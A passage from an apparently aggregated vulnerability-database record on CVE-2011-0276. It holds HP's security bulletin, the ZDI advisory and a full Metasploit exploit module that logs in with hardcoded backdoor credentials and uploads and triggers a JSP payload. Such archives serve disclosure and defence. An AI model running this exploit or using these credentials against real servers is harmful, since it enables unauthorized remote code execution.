"2011-11-09T00:00:00", "published": "2011-01-31T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-034", "id": "ZDI-11-034", "title": "HP OpenView Performance Insight Server Backdoor Account Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:00", "bulletinFamily": "exploit", "description": "", "modified": "2011-03-16T00:00:00", "published": "2011-03-16T00:00:00", "href": "https://packetstormsecurity.com/files/99381/HP-OpenView-Performance-Insight-Server-Backdoor-Account-Code-Execution.html", "id": "PACKETSTORM:99381", "type": "packetstorm", "title": "HP OpenView Performance Insight Server Backdoor Account Code Execution", "sourceData": "`## \n# $Id: hp_openview_insight_backdoor.rb 11969 2011-03-15 21:56:11Z swtornio $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nHttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Performance Insight Server Backdoor Account Code Execution', \n'Description' => %q{ \nThis module exploits a hidden account in the com.trinagy.security.XMLUserManager Java \nclass. When using this account, an attacker can abuse the \ncom.trinagy.servlet.HelpManagerServlet class and write arbitary files to the system \nallowing the execution of arbitary code. \n \nNOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0 \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 11969 $', \n'Platform' => 'win', \n'Privileged' => true, \n'References' => \n[ \n[ 'CVE', '2011-0276' ], \n[ 'OSVDB', '70754' ], \n], \n'Targets' => \n[ \n[ 'Universal Windows Target', \n{ \n'Arch' => ARCH_JAVA, \n'Payload' => \n{ \n'DisableNops' => true, \n}, \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 31 2011')) \n \nregister_options( \n[ \nOpt::RPORT(80), \nOptString.new('USERNAME', [ false, 'The username to authenticate as', 'hch908v' ]), \nOptString.new('PASSWORD', [ false, 'The password for the specified username', 'z6t0j$+i' ]) \n], self.class ) \n \nend \n \ndef exploit \n \ncreds = \"#{datastore['USERNAME']}\" + \":\" + \"#{datastore['PASSWORD']}\" \n \ndir = rand_text_alpha_upper(rand(8) + 1) \npage = rand_text_alpha_upper(8) + \".jsp\" \nuid = rand(20).to_s \n \nfile = \"-----------------------------#{uid}\\r\\n\" \nfile << \"Content-Disposition: form-data; name=\\\"filename\\\"; filename=\\\"#{page}\\\"\\r\\n\" \nfile << \"Content-Type: application/x-java-archive\\r\\n\\r\\n\" \nfile << payload.encoded + \"\\r\\n\" \nfile << \"-----------------------------#{uid}\\r\\n\" \n# if (p.getName().equals(\"location\")); ... \nfile << \"Content-Disposition: form-data; name=\\\"location\\\"\\r\\n\" \nfile << \"Content-Type: text/plain\\r\\n\\r\\n\" \nfile << dir + \"\\r\\n\" \nfile << \"-----------------------------#{uid}\\r\\n\\r\\n\" \n \nprint_status(\"Sending our POST request...\") \n \nres = send_request_cgi( \n{ \n'uri' => \"/reports/helpmanager\", \n'version' => '1.1', \n'method' => 'POST', \n'ctype' => 'multipart/form-data; boundary=---------------------------' + uid, \n'data' => file, \n'headers' => \n{ \n=begin \nthis.internal = new User(\"hch908v\"); \nthis.internal.setName(\"hidden user\"); \nthis.internal.setEncryptedPassword(TrendCrypt.crypt(\"hch908v\", \"z6t0j$+i\")); \nthis.internal.addRole(\"user\"); \nthis.internal.addRole(\"admin\"); \n=end \n'Authorization' => \"Basic #{Rex::Text.encode_base64(creds)}\", \n \n} \n}, 5) \n \nif ( res and res.code == 200 ) \nprint_status(\"Login/Upload successful. Triggering payload at '/help/#{dir}/#{page}'...\") \nsend_request_raw({ \n'uri' => \"/help/#{dir}/#{page}\", \n'method' => 'GET', \n'version' => '1.0', \n}, 5) \n \nhandler \nelse \nprint_error(\"Login/Upload refused!\") \nreturn \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/99381/hp_openview_insight_backdoor.rb.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02695453\r\nVersion: 1\r\n\r\nHPSBMA02627 SSRT090246 rev.1 - HP OpenView Performance Insight Server, Remote Execution of Arbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2011-01-31\r\nLast Updated: 2011-01-31\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential vulnerability has been identified with HP OpenView Performance Insight Server. The vulnerability could be exploited remotely to execute arbitrary\r\ncode.\r\n\r\nReferences: CVE-2011-0276, ZDI-CAN-606\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP OpenView Performance Insight Server v5.2, v5.3, v5.31, v5.4, v5.41 running on HP-UX, Linux, Solaris, and Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2011-0276 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Stephen Fewer of Harmony Security along with TippingPoint's Zero Day Initiative for reporting this vulnerability to\r\nsecurity-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has made a hotfix available to resolve the vulnerability for HP OpenView Performance Insight Server v5.4 and v5.41.\r\n\r\nFor HP OpenView Performance Insight Server v5.4 and v5.41\r\n\r\nContact the normal HP Services support channel to request the "5.41.002 piweb HF02" hotfix.\r\n\r\nFor HP OpenView Performance Insight Server v5.2, v5.3 and v5.31\r\n\r\nUpgrade to HP OpenView Performance Insight Server 5.41 and apply the hotfix listed above.\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\nApply the "5.41.002 piweb HF02" hotfix.\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued\r\nby HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information\r\nsee https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS (for HP-UX)\r\n\r\nHP-UX B.11.31\r\nHP-UX B.11.23 (IA)\r\nHP-UX B.11.23 (PA)\r\nHP-UX B.11.11\r\n=============\r\naction: apply the "5.41.002 piweb HF02" hotfix if HP OpenView Performance Insight Server is installed\r\n\r\nEND AFFECTED VERSIONS (for HP-UX)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 31 January 2011 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with\r\nthe customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security\r\nfeatures of software products to provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information\r\ncontained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for\r\nany damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties,\r\neither express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without\r\nwarranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or\r\nconsequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data,\r\nor software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products\r\nreferenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk1GzEkACgkQ4B86/C0qfVlYeQCgrpVPadqbq5A4o9Oz/ykEuja/\r\nJboAoK42gfsFwnu3Ywe5bJNTAwx/hRDC\r\n=GnVC\r\n-----END PGP SIGNATURE-----", "modified": "2011-02-04T00:00:00", "published": "2011-02-04T00:00:00", "id": "SECURITYVULNS:DOC:25612", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25612", "title": "[security bulletin] HPSBMA02627 SSRT090246 rev.1 - HP OpenView Performance Insight Server, Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "description": "ZDI-11-034: HP OpenView Performance Insight Server Backdoor Account Code Execution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-034\r\n\r\nJanuary 31, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-0276\r\n\r\n-- CVSS:\r\n10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Performance Insight\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9256. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Hewlett-Packard OpenView Performance Insight\r\nServer. Authentication is not required to exploit this vulnerability.\r\n\r\nThe specific vulnerability is due to a hidden account present within the\r\ncom.trinagy.security.XMLUserManager Java class. Using this account a\r\nmalicious user can access the com.trinagy.servlet.HelpManagerServlet\r\nclass. This is defined within the piweb.jar file installed with\r\nPerformance Insight. This class exposes a doPost() method which an\r\nattacker can use to upload malicious files to the server. Accessing\r\nthese files can then lead to arbitrary code execution under the context\r\nof the SYSTEM user.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453\r\n\r\n-- Disclosure Timeline:\r\n2009-10-27 - Vulnerability reported to vendor\r\n2011-01-31 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Stephen Fewer of Harmony Security (www.harmonysecurity.com)\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "modified": "2011-02-04T00:00:00", "published": "2011-02-04T00:00:00", "id": "SECURITYVULNS:DOC:25610", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25610", "title": "ZDI-11-034: HP OpenView Performance Insight Server Backdoor Account Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}